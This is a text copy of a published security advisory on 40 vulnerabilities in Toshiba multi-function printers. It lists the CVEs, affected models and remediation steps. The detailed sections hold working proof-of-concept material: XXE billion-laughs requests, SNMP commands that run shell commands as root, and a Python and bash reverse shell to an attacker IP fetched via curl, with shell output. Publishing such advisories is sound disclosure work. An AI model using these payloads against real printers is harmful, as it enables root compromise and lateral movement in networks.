Share
## https://sploitus.com/exploit?id=PACKETSTORM:179367
Hello,  
  
Please find a text-only version below sent to security mailing lists.  
  
The complete version on "40 vulnerabilities in Toshiba Multi-Function  
Printers" is posted here:  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html  
  
The text version is also posted here:  
https://pierrekim.github.io/advisories/2024-toshiba-mfp.txt  
  
  
=== text-version of the advisory ===  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
## Advisory Information  
  
Title: 40 vulnerabilities in Toshiba Multi-Function Printers  
Advisory URL: https://pierrekim.github.io/advisories/2024-toshiba-mfp.txt  
Blog URL: https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html  
Date published: 2024-06-27  
Vendors contacted: Toshiba  
Release mode: Released  
CVE: CVE-2024-27141, CVE-2024-27142, CVE-2024-27143, CVE-2024-27144,  
CVE-2024-27145, CVE-2024-27146, CVE-2024-27147, CVE-2024-27148,  
CVE-2024-27149, CVE-2024-27150, CVE-2024-27151, CVE-2024-27152,  
CVE-2024-27153, CVE-2024-27154, CVE-2024-27155, CVE-2024-27156,  
CVE-2024-27157, CVE-2024-27158, CVE-2024-27159, CVE-2024-27160,  
CVE-2024-27161, CVE-2024-27162, CVE-2024-27163, CVE-2024-27164,  
CVE-2024-27165, CVE-2024-27166, CVE-2024-27167, CVE-2024-27168,  
CVE-2024-27169, CVE-2024-27170, CVE-2024-27171, CVE-2024-27172,  
CVE-2024-27173, CVE-2024-27174, CVE-2024-27175, CVE-2024-27176,  
CVE-2024-27177, CVE-2024-27178, CVE-2024-27179, CVE-2024-27180  
  
  
  
## Product description  
  
> e-STUDIO Multi-Function Printers (MFPs) are fast and productive, providing businesses and organisations the capability to produce what you need, when you need it.  
>  
> From https://www.toshibatec.co.uk/workplace-solutions/products-and-solutions/mfps-and-printers/  
  
  
  
## Vulnerability Summary  
  
Vulnerable versions: 103 different models of Toshiba Multi-Function  
Printers (MFP) are vulnerable. It is recommended to visit the official  
Toshiba advisory  
(https://www.toshibatec.com/information/20240531_01.html), review the  
list of affected printers  
(https://www.toshibatec.com/information/pdf/information20240531_01.pdf)  
and apply security patches and replace unsupported MFP models.  
  
The summary of the vulnerabilities is as follows:  
  
1. CVE-2024-27141 - Pre-authenticated Blind XML External Entity (XXE)  
injection - DoS  
2. CVE-2024-27142 - Pre-authenticated XXE injection  
3. CVE-2024-27143 - Pre-authenticated Remote Code Execution as root  
4. CVE-2024-27144 - Pre-authenticated Remote Code Execution as root or  
apache and multiple Local Privilege Escalations  
4.1. Remote Code Execution - Upload of a new .py module inside WSGI  
Python programs  
4.2. Remote Code Execution - Upload of a new .ini configuration files  
inside WSGI Python programs  
4.3. Remote Code Execution - Upload of a malicious script  
`/tmp/backtraceScript.sh` and injection of malicious gdb commands  
4.4. Remote Code Execution - Upload of a malicious  
`/home/SYSROM_SRC/build/common/bin/sapphost.py` program  
4.5. Remote Code Execution - Upload of malicious libraries  
4.6. Other ways to get Remote Code Execution  
5. CVE-2024-27145 - Multiple Post-authenticated Remote Code Executions as root  
6. CVE-2024-27146 - Lack of privileges separation  
7. CVE-2024-27147 - Local Privilege Escalation and Remote Code  
Execution using snmpd  
8. CVE-2024-27148 - Local Privilege Escalation and Remote Code  
Execution using insecure PATH  
9. CVE-2024-27149 - Local Privilege Escalation and Remote Code  
Execution using insecure LD_PRELOAD  
10. CVE-2024-27150 - Local Privilege Escalation and Remote Code  
Execution using insecure LD_LIBRARY_PATH  
11. CVE-2024-27151 - Local Privilege Escalation and Remote Code  
Execution using insecure permissions for 106 programs  
11.1. 3 vulnerable programs not running as root  
11.2. 103 vulnerable programs running as root  
12. CVE-2024-27152 - Local Privilege Escalation and Remote Code  
Execution using insecure permissions for libraries  
12.1. Example with `/home/SYSROM_SRC/bin/syscallerr`  
13. CVE-2024-27153 - Local Privilege Escalation and Remote Code  
Execution using CISSM  
14. CVE-2024-27154 and CVE-2024-27155 - Passwords stored in clear-text  
logs and insecure logs  
14.1. Clear-text password written in logs when an user logs into the printer  
14.2. Clear-text password written in logs when a password is modified  
15. CVE-2024-27156 - Leak of authentication sessions in insecure logs  
in /ramdisk/work/log directory  
16. CVE-2024-27157 - Leak of authentication sessions in insecure logs  
in /ramdisk/al/network/log directory  
17. CVE-2024-27158 - Hardcoded root password  
18. CVE-2024-27159 - Hardcoded password used to encrypt logs  
19. CVE-2024-27160 - Hardcoded password used to encrypt logs and use  
of a weak digest cipher  
20. CVE-2024-27161 - Hardcoded password used to encrypt files  
21. CVE-2024-27162 - DOM-based XSS present in the /js/TopAccessUtil.js file  
22. CVE-2024-27163 - Leak of admin password and passwords  
23. CVE-2024-27164 - Hardcoded credentials in telnetd  
24. CVE-2024-27165 - Local Privilege Escalation using PROCSUID  
25. CVE-2024-27166 - Insecure permissions for core files  
26. CVE-2024-27167 - Insecure permissions used for Sendmail - Local  
Privilege Escalation  
27. CVE-2024-27168 - Hardcoded keys found in Python applications used  
to generate authentication cookies  
28. CVE-2024-27169 - Lack of authentication in WebPanel - Local  
Privilege Escalation  
29. CVE-2024-27170 - Hardcoded credentials for WebDAV access  
30. CVE-2024-27171 - Insecure permissions  
31. CVE-2024-27172 - Remote Code Execution - command injection as root  
32. CVE-2024-27173 - Remote Code Execution - insecure upload  
33. CVE-2024-27174 - Remote Code Execution - insecure upload  
34. CVE-2024-27175 - Local File Inclusion  
35. CVE-2024-27176 - Remote Code Execution - insecure upload  
36. CVE-2024-27177 - Remote Code Execution - insecure upload  
37. CVE-2024-27178 - Remote Code Execution - insecure copy  
38. CVE-2024-27179 - Session disclosure inside the log files in the  
installation of applications  
39. CVE-2024-27180 - TOCTOU vulnerability in the installation of  
applications, allowing to install rogue applications and get RCE  
  
CVE-2024-27171 to CVE-2024-27180 affect the implementation of  
third-party application system and third-party applications installed  
by default in Toshiba printers - this is an extremely interesting  
attack surface for persistence.  
  
TL;DR: An attacker can compromise Toshiba Multi-Function Printers  
using multiple vulnerabilities.  
  
List of vulnerable models of Toshiba Multi-Function Printers (103 models):  
  
2021AC, 2521AC, 2020AC, 2520AC, 2025NC, 2525AC, 3025AC, 3525AC,  
3525ACG, 4525AC, 4525ACG, 5525AC, 5525ACG,  
6525AC, 6525ACG, 2528A, 3028A, 3528A, 3528AG, 4528A, 4528AG,  
5528A, 6528A, 6526AC, 6527AC, 7527AC, 6529A,  
7529A, 9029A, 330AC, 400AC, 2010AC, 2110AC, 2510AC, 2610AC,  
2015NC, 2515AC, 2615AC, 3015AC, 3115AC, 3515AC,  
3615AC, 4515AC, 4615AC, 5015AC, 5115AC, 2018A, 2518A, 2618A,  
3018A, 3118A, 3018AG, 3518A, 3518AG, 3618A,  
3618AG, 4518A, 4518AG, 4618A, 4618AG, 5018A, 5118A, 5516AC,  
5616AC, 6516AC, 6616AC, 7516AC, 7616AC, 5518A,  
5618A, 6518A, 6618A, 7518A, 7618A, 8518A, 8618A, 2000AC, 2500AC,  
2005NC, 2505AC, 3005AC, 3505AC, 4505AC,  
5005AC, 2008A, 2508A, 3008A, 3008AG, 3508A, 3508AG, 4508A, 4508AG,  
5008A, 5506AC, 6506AC, 7506AC, 5508A,  
6508A, 7508A, 8508A, 3508LP, 4508LP, 5008LP.  
  
_Miscellaneous notes_:  
  
This security assessment was entirely done using a blackbox approach  
and fully-remote - I only had some IPs of printers (no physical access  
and no credentials for admin or normal users). Consequently, the  
physical security of the printers was not analyzed and the  
vulnerabilities were confirmed with different models running the  
latest firmware versions (e-STUDIO2010AC, e-STUDIO3005AC,  
e-STUDIO3508A and e-STUDIO5018A).  
  
The vulnerabilities were communicated to Toshiba on June 14, 2023 and  
communications with Toshiba were very effective.  
  
_Impacts_  
  
An attacker can compromise Toshiba multi-function printers (MFP) and  
execute code. These printers are running Linux and are powerful. They  
are ideal to host implants (and fun programs, like Bettercap) and move  
laterally inside infrastructures.  
  
_Recommendations_  
  
- - Use network segmentation to isolate MFPs.  
- - Apply security patches.  
- - Replace unsupported MFPs.  
  
  
  
## Details - Pre-authenticated Blind XML External Entity (XXE) injection - DoS  
  
The Toshiba printers use XML communication for the `/contentwebserver`  
API endpoint provided by the printer.  
  
This endpoint is managed by an Apache module located inside the  
`mod_contentwebserver.so` library. This library provides XML parsing  
and is vulnerable to a time-based blind XML External Entity (XXE)  
vulnerability.  
  
Using a Billion-laugh attack, we can confirm there is a time-based  
blind XXE vulnerability. When sending only 1 entity (&lol1) that is  
defined inside the lolz root element, this &lol1 entity is expanding  
into 10 entities and the request takes 200ms.  
  
With an entity that is expanding into:  
  
- - 10^10 entities, the request takes 206ms;  
- - 10^10^10 entities, the request takes 541ms;  
- - 10^10^10^10 entities, the request takes 2.7s;  
- - 10^10^10^10^2 entities, the request takes 8.8s;  
- - 10^10^10^10^2 entities, the request takes 30.9s;  
  
Even if the Apache server displays `MODULE_ERROR:SendRequest failed`,  
the XML has been successfully evaluated by the  
`mod_contentwebserver.so` library running in the remote printer.  
  
The payload is:  
  
POST /contentwebserver HTTP/1.1  
Host: 10.0.0.1:8080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0)  
Gecko/20100101 Firefox/102.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cache-Control: no-cache  
Pragma: no-cache  
Content-Type: text/plain; charset=utf-8  
csrfpId: 10.0.0.2.852d519a6fa9825fae857bac5c003da0  
Content-Length: 759  
Origin: http://10.0.0.1:8080  
Connection: close  
Referer: http://10.0.0.1:8080/?MAIN=TOPACCESS  
Cookie: Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0;  
Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DLOGS;  
IgnoreSessionTimeout=1  
  
<!DOCTYPE lolz [  
<!ENTITY lol "lol">  
<!ELEMENT lolz (#PCDATA)>  
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">  
<!ENTITY lol2  
"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">  
<!ENTITY lol3  
"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">  
<!ENTITY lol4  
"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">  
<!ENTITY lol5 "&lol4;&lol4;&lol4;">  
<!ENTITY lol6  
"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">  
<!ENTITY lol7  
"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">  
<!ENTITY lol8  
"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">  
<!ENTITY lol9  
"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">  
]>  
<lolz>&lol5;</lolz>  
  
Using this HTTP request inside Burp (with a correct session while  
browsing the printer without authentication), we can modify the entity  
on the last line; we can see that the XML has been parsed by comparing  
the time required for the printer to analyze the request.  
  
The time will appear inside Burp on the bottom-right of the Window (in  
red in the following screenshots):  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
With 10^10^10^10^4 entity, then request takes 30 seconds.  
  
HTTP requests containing more XML complexity (with a lot of XML  
entities to be parsed) will DoS the printer and the CPU of the printer  
will run at 100%.  
  
The XML parser is vulnerable to XXE, without authentication.  
  
Exfiltration of file over HTTP, FTP and gopher was not obtained as  
some protections seem to be implemented in the XML parser.  
  
  
  
## Details - Pre-authenticated XXE injection  
  
The Toshiba printers use XML communication for the `/contentwebserver`  
API endpoint provided by the printer.  
  
This endpoint is managed by an Apache module located inside the  
`mod_contentwebserver.so` library. This library provides XML parsing  
and is vulnerable to a XML External Entity (XXE) vulnerability.  
  
Using a Billion-laugh attack and correctly formatted data for the  
printer (with the Toshiba-specific non-public DTD, the tags will be  
interpreted by the remote printer), we can confirm the presence of a  
XXE vulnerability. The resulting evaluated XML will be displayed by  
the printer:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
The malicious payload is (containing a `<X>&lol4;</X>`):  
  
POST /contentwebserver HTTP/1.1  
Host: 10.0.0.1:8080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0)  
Gecko/20100101 Firefox/102.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cache-Control: no-cache  
Pragma: no-cache  
Content-Type: text/plain; charset=utf-8  
csrfpId: 10.0.0.2.5d5255447c6eb69fc84a2d8c2056eb7d  
Content-Length: 1226  
Origin: http://10.0.0.1:8080  
Connection: close  
Referer: http://10.0.0.1:8080/Administration/CreateNewPwd.html  
Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US;  
pageTrack=MAIN%3DDEVICE; IgnoreSessionTimeout=1; clicked=0;  
addrLastVisited=ADDRBK;  
Session=10.0.0.2.5d5255447c6eb69fc84a2d8c2056eb7d;  
PREF=%7BList%2C8%2CClip  
boardForPage-%7D; PROGSTAT=0  
  
<!DOCTYPE lolz [  
<!ENTITY lol "lol">  
<!ELEMENT lolz (#PCDATA)>  
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">  
<!ENTITY lol2  
"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">  
<!ENTITY lol3  
"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">  
<!ENTITY lol4  
"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">  
<!ENTITY lol5 "&lol4;&lol4;&lol4;">  
<!ENTITY lol6  
"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">  
<!ENTITY lol7  
"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">  
<!ENTITY lol8  
"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">  
<!ENTITY lol9  
"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">  
]>  
<?xml version="1.0"?>  
<DeviceInformationModel>  
<GetValue>  
<UserManager>  
<View>  
<Users/>  
</View>  
</UserManager>  
</GetValue>  
<SetValue>  
<UserManager>  
<View>  
<Users>  
<User>  
<Information>  
<X>&lol4;</X>  
</Information>  
</User>  
</Users>  
</View>  
</UserManager>  
</SetValue>  
<Command>  
<ForgotPassword>  
<commandNode>UserManager/Users</commandNode>  
<Params>  
<userDetails  
contentType="XPath">UserManager/View/Users/User</userDetails>  
<cmdDetails commandType="Reset"/>  
</Params>  
</ForgotPassword>  
</Command>  
</DeviceInformationModel>  
  
And the response will be:  
  
HTTP/1.1 200 OK  
Date: Wed, 27 May 2023 10:54:12 GMT  
Server: Apache  
X-Frame-Options: SAMEORIGIN  
Cache-Control: max-age=63072000  
Accept-Language: en-US,en;q=0.5  
Connection: close  
Content-Type: text/xml  
Content-Length: 30465  
  
<?xml version="1.0"?>  
<DeviceInformationModel>  
<GetValue>  
<UserManager>  
<View>  
<Users>  
<User>  
<Information>  
  
<X>lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol[...]lollollollollol</X>  
</Information>  
</User>  
</Users>  
</View>  
</UserManager>  
</GetValue>  
<Command>  
<ForgotPassword>  
<commandNode>UserManager/Users</commandNode>  
<Params>  
<userDetails  
contentType="XPath">UserManager/View/Users/User</userDetails>  
<cmdDetails commandType="Reset"/>  
</Params>  
<Response>  
<statusOfOperation>STATUS_FAILED</statusOfOperation>  
</Response>  
</ForgotPassword>  
</Command>  
</DeviceInformationModel>  
kali%  
  
The XML parser is vulnerable to XXE, without authentication.  
  
An attacker can exploit the XXE to retrieve information.  
  
Exploitability was not analyzed in depth since a RCE was found at the  
same time: Pre-authenticated Remote Code Execution as root.  
  
  
  
## Details - Pre-authenticated Remote Code Execution as root  
  
It was observed that the Toshiba printers use SNMP for configuration.  
  
By default, these communities are used:  
  
- - `public` for read only access;  
- - `private` for read/write access.  
  
Using the `private` community, it is possible to remotely execute  
commands as root on the remote printer.  
  
For example, these commands will execute the command `id` as root on  
the remote printer:  
  
kali% snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private [ip]  
'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh  
'nsExtendArgs."cmd"' = '-c id'  
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: createAndGo(4)  
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh  
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c id  
  
kali% snmpbulkwalk -c private -v2c [ip] NET-SNMP-EXTEND-MIB::nsExtendObjects  
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 6  
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh  
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c id  
NET-SNMP-EXTEND-MIB::nsExtendInput."cmd" = STRING:  
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."cmd" = INTEGER: 5  
NET-SNMP-EXTEND-MIB::nsExtendExecType."cmd" = INTEGER: exec(1)  
NET-SNMP-EXTEND-MIB::nsExtendRunType."cmd" = INTEGER: run-on-read(1)  
NET-SNMP-EXTEND-MIB::nsExtendStorage."cmd" = INTEGER: volatile(2)  
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: active(1)  
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."cmd" = STRING:  
uid=0(root) gid=2000(trusted) groups=0(root)  
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."cmd" = STRING:  
uid=0(root) gid=2000(trusted) groups=0(root)  
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."cmd" = INTEGER: 1  
NET-SNMP-EXTEND-MIB::nsExtendResult."cmd" = INTEGER: 0  
NET-SNMP-EXTEND-MIB::nsExtendOutLine."cmd".1 = STRING: uid=0(root)  
gid=2000(trusted) groups=0(root)  
  
Using this vulnerability will allow any attacker to get a root access  
on a remote Toshiba printer as shown below.  
  
This following PoC will execute a connect-back shell with root  
privilege to 10.0.0.2:21/tcp:  
  
kali% snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private [ip]  
'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' =  
/home/SYSROM_SRC/build/release/bin/python 'nsExtendArgs."cmd"' = '-c  
"import sys,socket,os,pty;s=socket.socket();s.connect((\"10.0.0.2\",21));[os.dup2(s.fileno(),fd)  
for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'  
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: createAndGo(4)  
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING:  
/home/SYSROM_SRC/build/release/bin/python  
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c "import  
sys,socket,os,pty;s=socket.socket();s.connect((\"10.0.0.2\",21));[os.dup2(s.fileno(),fd)  
for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"  
kali% snmpbulkwalk -c private -v2c [ip] NET-SNMP-EXTEND-MIB::nsExtendObjects  
  
And on the attacker machine, we will receive a shell on port 21/tcp:  
  
kali# nc -l -v -p 21  
listening on [any] 21 ...  
10.0.0.1: inverse host lookup failed: Unknown host  
connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 43467  
sh-4.1# uname -ap  
Linux MFP12188257 3.10.38-ltsi-WR6.0.0.11_standard #3010 SMP Wed  
Jul 6 16:20:23 IST 2022 i686 GNU/Linux  
sh-4.1# id  
uid=0(root) gid=2000(trusted) groups=0(root)  
sh-4.1# exit  
  
  
The attacker will then get a full root access in the printer,  
including full access to the encrypted partition:  
  
kali# nc -l -v -p 443  
listening on [any] 443 ...  
10.0.0.1: inverse host lookup failed: Unknown host  
connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 36468  
bash-4.1# df -h  
df -h  
Filesystem Size Used Avail Use% Mounted on  
rootfs 4.8G 3.7G 904M 81% /  
/dev/root 48M 28M 18M 62% /old_root  
/dev/sda2 4.8G 3.7G 904M 81% /  
/dev/sda13 4.8G 49M 4.5G 2% /platform  
none 1.5G 188K 1.5G 1% /dev  
/dev/sda3 4.8G 1.3G 3.4G 28% /rollback  
/dev/sda5 25G 904M 23G 4% /work  
/dev/sda6 2.9G 620M 2.2G 23% /registration  
/dev/sda7 976M 1.3M 908M 1% /backup  
/dev/sda8 32G 60M 30G 1% /imagedata  
/dev/sda9 94G 65M 89G 1% /application  
/dev/mapper/enc_encryption  
992M 2.6M 964M 1% /encryption  
/dev/sda12 119G 60M 112G 1% /storage  
tmpfs 1.5G 3.7M 1.5G 1% /dev/shm  
bash-4.1# mount  
mount  
rootfs on / type rootfs (rw)  
/dev/root on /old_root type ext2 (rw,relatime,errors=continue,user_xattr)  
proc on /old_root/proc type proc (rw,relatime)  
/dev/sda2 on / type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)  
/dev/sda13 on /platform type ext4  
(rw,relatime,nodelalloc,nobarrier,data=ordered)  
proc on /proc type proc (rw,relatime)  
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)  
none on /dev type tmpfs (rw,relatime,mode=755)  
ramfs on /ramdisk type ramfs (rw,relatime,size=100m)  
/dev/sda3 on /rollback type ext4  
(rw,relatime,nodelalloc,nobarrier,data=ordered)  
/dev/sda5 on /work type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)  
/dev/sda6 on /registration type ext4  
(rw,relatime,nodelalloc,nobarrier,data=ordered)  
/dev/sda7 on /backup type ext4  
(rw,relatime,nodelalloc,nobarrier,data=ordered)  
/dev/sda8 on /imagedata type ext4  
(rw,relatime,nodelalloc,nobarrier,data=ordered)  
/dev/sda9 on /application type ext4  
(rw,relatime,nodelalloc,nobarrier,data=ordered)  
/dev/mapper/enc_encryption on /encryption type ext4  
(rw,relatime,nodelalloc,nobarrier,data=ordered)  
/dev/sda12 on /storage type ext4  
(rw,relatime,nodelalloc,nobarrier,data=ordered)  
tmpfs on /dev/shm type tmpfs (rw,relatime,mode=755)  
devpts on /dev/pts type devpts (rw,relatime,mode=600)  
fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)  
bash-4.1#  
  
The vulnerability is located inside net-snmpd, as net-snmpd supports  
the `NET-SNMP-EXTEND-MIB` extension MIB.  
  
This extension allows the execution of code from the net-snmpd daemon,  
with root privileges, with 2 steps:  
  
1. Definition of a new MIB;  
2. Execution of the new MIB.  
  
A bash payload is also provided:  
  
This following PoC will download a shell script, save it inside  
`/dev/shm/pwn.sh` and execute it as root on the targeted printer:  
  
kali% cat /var/www/html/pwn.sh  
#!/bin/sh  
  
bash -i >& /dev/tcp/10.0.0.2/443 0>&1  
  
kali% cat ./remote-pwn.sh  
#!/bin/sh  
  
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1  
'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh  
'nsExtendArgs."cmd"' = '-c "curl http://10.0.0.2/pwn.sh -o  
/dev/shm/pwn.sh"'  
snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects  
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1  
'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh  
'nsExtendArgs."cmd"' = '-c "chmod 755 /dev/shm/pwn.sh"'  
snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects  
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1  
'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh  
'nsExtendArgs."cmd"' = ' "/dev/shm/pwn.sh"'  
snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects  
  
Using this PoC to get a connect-back root shell:  
  
kali% ./remote-pwn.sh 10.0.0.1  
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: createAndGo(4)  
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh  
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c "curl  
http://10.0.0.2/pwn.sh -o /dev/shm/pwn.sh"  
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 21  
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh  
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c "curl  
http://10.0.0.2/pwn.sh -o /dev/shm/pwn.sh"  
NET-SNMP-EXTEND-MIB::nsExtendInput."cmd" = STRING:  
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."cmd" = INTEGER: 5  
NET-SNMP-EXTEND-MIB::nsExtendExecType."cmd" = INTEGER: exec(1)  
NET-SNMP-EXTEND-MIB::nsExtendRunType."cmd" = INTEGER: run-on-read(1)  
NET-SNMP-EXTEND-MIB::nsExtendStorage."cmd" = INTEGER: volatile(2)  
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: active(1)  
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."cmd" = STRING: % Total  
% Received % Xferd Average Speed Time Time Time Current  
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."cmd" = STRING: % Total  
% Received % Xferd Average Speed Time Time Time Current  
Dload Upload Total Spent  
Left Speed  
100 53 100 53 0 0 53 0 0:00:01 --:--:--  
0:00:01 114  
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."cmd" = INTEGER: 3  
NET-SNMP-EXTEND-MIB::nsExtendResult."cmd" = INTEGER: 0  
NET-SNMP-EXTEND-MIB::nsExtendOutLine."cmd".1 = STRING: % Total  
% Received % Xferd Average Speed Time Time Time Current  
NET-SNMP-EXTEND-MIB::nsExtendOutLine."cmd".2 = STRING:  
Dload Upload Total Spent Left Speed  
100 53 100 53 0 0 53 0 0:00:01 --:--:--  
0:00:01 114  
Error in packet.  
Reason: inconsistentValue (The set value is illegal or unsupported  
in some way)  
Failed object: NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd"  
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 21  
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: createAndGo(4)  
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh  
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: "/dev/shm/pwn.sh"  
caTimeout: No Response from 10.0.0.1  
  
  
And the connect-back shell script will connect to 10.0.0.2 on port  
443/tcp, as defined in the previous `pwn.sh` script:  
  
kali# nc -l -v -p 443  
listening on [any] 443 ...  
10.0.0.1: inverse host lookup failed: Unknown host  
connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 36464  
bash-4.1# uname -ap  
Linux MFP14144292 3.10.38-ltsi-WR6.0.0.11_standard #3513 SMP Tue  
Jul 5 09:58:22 IST 2022 i686 GNU/Linux  
bash-4.1# id  
uid=0(root) gid=2000(trusted) groups=0(root)  
bash-4.1#  
  
We can also review the configuration file located at  
`/encryption/al/network/config/snmpd.conf`, containing the default  
communities:  
  
bash-4.1# grep -v '^#' /encryption/al/network/config/snmpd.conf  
rocommunity public  
  
rocommunity6 public  
  
rwcommunity private  
  
rwcommunity6 private  
  
com2sec udp 0.0.0.0/24 public  
  
view all included .1 80  
view generaluser_view excluded .1  
view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.23.2.1.3  
view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.21.4.1.3  
view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.21.4.1.4  
  
access udpGroup "toshibaAmerica" v1 noauth  
exact all all none  
access admin_priv_group "" usm priv  
prefix all all none  
access admin_auth_group "" usm auth  
prefix all all none  
access generaluser_priv_group "" usm priv  
prefix all generaluser_view none  
access generaluser_auth_group "" usm auth  
prefix all generaluser_view none  
  
trapcommunity public  
  
dlmod mibs_impl  
/home/SYSROM_SRC/lib/libalmibs_impl.so  
  
master off  
  
agentaddress udp:161,udp6:161  
  
authtrapenable 1  
  
maxGetbulkRepeats 20  
  
maxGetbulkResponses 100bash-4.1#  
  
SNMP is also exposed over IPv6.  
  
  
  
## Details - Pre-authenticated Remote Code Execution as root or apache  
and multiple Local Privilege Escalations  
  
Toshiba printers provide several ways to upload files using the web interface.  
  
By default, this web interface is reachable without authentication.  
  
For example, using the e-filing web interface, freely reachable using  
http://ip:8080/?MAIN=EFILING, we can upload documents:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
[please use the HTML version at  
